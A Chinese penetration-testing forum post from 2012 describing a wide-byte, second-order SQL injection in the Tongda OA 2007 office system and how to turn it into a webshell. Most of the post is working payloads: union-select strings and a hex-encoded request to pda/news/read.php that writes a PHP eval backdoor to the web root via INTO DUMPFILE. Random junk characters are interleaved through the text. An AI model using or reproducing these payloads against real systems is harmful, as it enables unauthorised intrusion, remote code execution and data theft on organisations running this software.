中国网络渗透测试联盟

标题: 通达OA2007版本漏洞及getshell [打印本页]
作者: admin    时间: 2012-12-20 08:09
标题: 通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
7 z7 |& F" j( v0 j4 y; X9 L
9 I" ^0 m4 s& S* B0 A* f* ?; H: s& m $ A# E5 I5 S6 Z' F' z$ J  w; }
Office Anywhere 2007 网络智能办公系统  {. O: y+ P/ b* `

9 N# H" o8 z9 H3 I4 k* ]http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
' E* ~' c0 C, h( F' Q/ Y8 S
+ M2 b* x; I% o* B8 c& s/ P
# {3 D# ?) ^7 l' C# W这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的  E) x! @# I5 s7 k. `

& j- }- x: q0 k8 F  f5 V. ]例如:SELECT * from USER where USER_ID='{$USERNAME}'  
/ l+ Y5 U  t  I; D其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
* P5 w& l, A/ w- c) Y : n0 f" q) F. F
这个时候我们是不是可以组合起来使用哪?' w, i2 _' c# f8 g9 G( N+ v1 `& |
, |/ [6 N' R) w% e) e1 R
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样8 q$ l8 x- O+ c, i" Q
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
. X( R$ v, [1 h
/ n( @: X7 h# h  f' s$ |7 Q这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
, [3 t6 x* A( P! p$ ~, G# ] . t" D5 \" o0 v- i3 K
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
! m! m! ^+ f  u/ e; C- x; t$ m9 {+ I
; t- K6 O* e' a6 f2 @: Y, K% m那么我们用字符串格式带入进行hex编码
0 f+ e9 b; D4 m: H ( `$ ~) I# c$ g) ]2 J# p# b
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23# [: n1 {8 R; T/ D. f# s- ]

% |5 W4 W- n! ~7 y1 V: k; H测试ok,获取oa的webshell- r9 |1 u2 `$ X" y  k

9 R4 `2 P% l" F( `' t; P4 E
. N& G8 [  A4 h" ppda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
$ H' R2 d' x: Z直接getwebshell



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2